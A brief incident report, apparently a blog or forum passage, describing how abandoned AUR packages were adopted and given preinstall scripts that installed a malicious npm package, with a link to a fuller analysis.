The initial affected packages were modified with preinstall scripts to use npm to install the atomic-lockfile package, a malicious payload.

Detailed analysis is here: https://ioctl.fail/preliminary-analysis-of-aur-malware/

You might be wondering how this happened. The truth is, the AUR package repository allows anyone to “adopt” a package and submit a change to the PKGBUILD/associated files if the package is marked as unmaintained. It turns out automating the hunt for abandoned packages and adoption of them is not uncommon.